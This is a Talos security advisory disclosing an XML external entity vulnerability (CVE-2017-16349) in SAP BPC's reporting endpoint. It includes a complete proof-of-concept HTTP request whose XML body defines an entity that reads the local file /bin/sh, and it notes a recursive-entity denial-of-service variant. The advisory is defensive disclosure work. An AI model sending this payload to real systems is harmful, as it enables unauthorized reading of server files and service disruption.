Talos Vulnerability Report

SAP

SAP BPC Web Application Information Disclosure Vulnerability

April 19, 2018
CVE Number

CVE-2017-16349

Summary

An exploitable XML external entity vulnerability exists in the reporting functionality of SAP BPC. A specially crafted XML request can cause an XML external entity to be referenced, resulting in information disclosure and potential denial of service. An attacker can issue authenticated HTTP requests to trigger this vulnerability.

Tested Versions

SAP BPC

Product URLs

https://www.sap.com/uk/products/bpc.html

CVSSv3 Score

6.4 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L

CWE

CWE-611 - Improper Restriction of XML External Entity Reference

Details

It was identified that the web application was vulnerable to an XML External Entity injection attack. While making malformed requests to most parts of the application appeared to produce error messages that indicated that XML validation was occurring, one location was identified where this was not the case:

POST /sap/bpc/systemrpt/GROUP_REPORTING1/AA HTTP/1.1
Accept: application/xml
Accept-Language: en
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
SAP-ModuleName: PC Web Client
SAP-TemplateName:  
Content-Type: application/xml; charset=UTF-8
Content-Length: 541
Cookie: sap-usercontext=sap-language=EN&sap-client=500; MYSAPSSO2=AjQxMDIBABgAQQBQAFAARQBOAFQARQBTAFQARQBSADMCAAYANQAwADADABAAQQBQAEMAIAAgACAAIAAgBAAYADIAMAAxADUAMAA1ADIANwAxADUANAA4BAAAQEAACAYAAgBYCQACAEX%2fAPwwgfkGCSqGSIb3DQEHAqCB6zCB6AIVqwWWarAkGBSsOAwIaBQAwCwYJKoZIhvcNAQcBMYHIMIHFAgEBMBkwDjEMMAoGA1UEAxMDQVBDAgcgFBIiFyE4MAkGBSsOAwIaBQCgXTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcFFhZGCSqGSIb3DQEJBTEPFw0xNTA1MjcxNTQ4MTdaMCMGCSqGSIb3DQEJBDEWBBRF0JDFCj0%2fafX%2fXaDDdqeXWf57xDAJBgcqhkjOOAQDBDAwLgIVALiRIey0Km0F40INQNQ%2fZOJaa3WoAhUAlHO3IGcRMTItvoVUKQLn2ngZR9U%3d; SAP_SESSIONID_APC_500=nNh7rq2Zn-CuMr1ABb_FzlVd-NyWhI8A4QCAAAoLIYc%3d
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

    <!DOCTYPE AuditActivityReportFilter [<!ELEMENT AuditActivityReportFilter ANY ><!ENTITY xxe SYSTEM "file:///bin/sh" >]>
<AuditActivityReportFilter xmlns="http://xml.sap.com/2010/02/bpc">
  <TimeScope>
    <StartTime/>
    <EndTime/>
  </TimeScope>
  <Paging>
    <PageSize>20</PageSize>
    <PageIndex>2</PageIndex>
  </Paging>
  <UserID/>
  <ActivityFor>AppSet</ActivityFor>
  <FunctionTask>&xxe;</FunctionTask>
  <Source/>
  <Parameter/>
  <Field/>
  <PreValue/>
  <NewValue/>
  <ReportFrom>ACTIVE</ReportFrom>
</AuditActivityReportFilter>

In this instance, two different responses were seen, which appeared to vary depending on whether the XXE entity was defined as a valid (as in this case) or invalid local file. In the event that an invalid file was referenced, an error was instead returned.

The vulnerability could also be used to trigger a CPU or memory exhaustion attack through recursively defined XML entities.

Credit

Discovered by Tim Brown of Security Advisory EMEAR